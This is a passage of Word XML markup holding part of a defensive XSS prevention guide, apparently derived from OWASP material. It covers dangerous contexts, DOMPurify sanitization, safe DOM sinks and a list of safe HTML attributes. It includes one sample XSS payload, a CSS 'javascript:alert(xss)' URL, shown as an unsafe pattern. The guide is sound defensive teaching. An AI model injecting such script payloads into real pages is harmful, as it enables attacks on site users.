          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Callback functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Where URLs are handled in code such as this CSS { background-url : “javascript:alert(xss)”; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>All JavaScript event handlers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>onclick()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>onerror()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>onmouseover()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Unsafe JS functions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>setTimeout()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Don't place variables into dangerous contexts as even with output encoding, it will not prevent an XSS attack fully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>HTML Sanitization</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="37" w:name="_Toc047ygmr8csc8"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Sometimes users need to author HTML. One scenario would be allow users to change the styling or structure of content inside a WYSIWYG editor. Output encoding here will prevent XSS, but it will break the intended functionality of the application. The styling will not be rendered. In these cases, HTML Sanitization should be used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>HTML Sanitization will strip dangerous HTML from a variable and return a safe string of HTML. OWASP recommends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://github.com/cure53/DOMPurify"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> for HTML Sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>let clean = DOMPurify.sanitize(dirty);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>There are some further things to consider:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>If you sanitize content and then modify it afterwards, you can easily void your security efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>If you sanitize content and then send it to a library for use, check that it doesn’t mutate that string somehow. Otherwise, again, your security efforts are void.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>You must regularly patch DOMPurify or other HTML Sanitization libraries that you use. Browsers change functionality and bypasses are being discovered regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sinks</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="38" w:name="_Toc6um96ah0g4sj"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Security professionals often talk in terms of sources and sinks. If you pollute a river, it'll flow downstream somewhere. It’s the same with computer security. XSS sinks are places where variables are placed into your webpage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Thankfully, many sinks where variables can be placed are safe. This is because these sinks treat the variable as text and will never execute it. Try to refactor your code to remove references to unsafe sinks like innerHTML, and instead use textContent or value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>elem.textContent = dangerVariable;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>elem.insertAdjacentText(dangerVariable);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>elem.className = dangerVariable;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>elem.setAttribute(safeName, dangerVariable);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>formfield.value = dangerVariable;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>document.createTextNode(dangerVariable);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>document.createElement(dangerVariable);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>elem.innerHTML = DOMPurify.sanitize(dangerVar);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe HTML Attributes include:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>align</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>alink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>bgcolor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>cellpadding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>cellspacing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>cols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>colspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>coords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>face</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>hspace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>ismap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>marginheight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>marginwidth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>nohref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>noresize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>noshade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>nowrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
